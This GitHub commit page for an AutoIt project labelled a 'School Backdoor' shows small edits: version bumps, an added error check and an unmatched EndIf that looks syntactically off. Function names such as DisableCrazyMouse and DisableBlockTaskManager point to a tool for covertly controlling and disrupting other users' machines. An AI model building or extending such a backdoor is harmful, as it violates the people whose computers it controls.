Skip to content

Commit

Permalink
Beta 3 Release!
Browse files Browse the repository at this point in the history
• Added to releases page
• Some fixes
  • Loading branch information
Kirlovon committed Sep 11, 2017
1 parent cf431bc commit bcbf9b0
Show file tree
Hide file tree
Showing 2 changed files with 6 additions and 2 deletions.
6 changes: 5 additions & 1 deletion Devil-ControlPanel.au3
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
Devil ControlPanel ( School Backdoor )
AutoIt Version: 3.3.14.2
Version: Beta 2.5 ( 20:45 11.09.2017)
Version: Beta 3 ( 20:55 11.09.2017)
#ce ----------------------------------------------------------------------------

Expand Down Expand Up @@ -37,6 +37,9 @@ EndIf

; Select shared folder ( server )
Global $Server_Directory = FileSelectFolder("Enter location of the shared folder!", "C:\")
If @error Then
Exit
EndIf

; ------------------------------------------------------------------------------

Expand Down Expand Up @@ -307,4 +310,5 @@ Func FastClosing()
DisableCrazyMouse()
DisableBlockTaskManager()
Exit
EndIf
EndFunc
2 changes: 1 addition & 1 deletion Devil-Server.au3
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
Devil Server ( School Backdoor )
AutoIt Version: 3.3.14.2
Version: Beta 2.5 ( 20:45 11.09.2017)
Version: Beta 3 ( 20:55 11.09.2017)
#ce ----------------------------------------------------------------------------

Expand Down

0 comments on commit bcbf9b0

Please sign in to comment.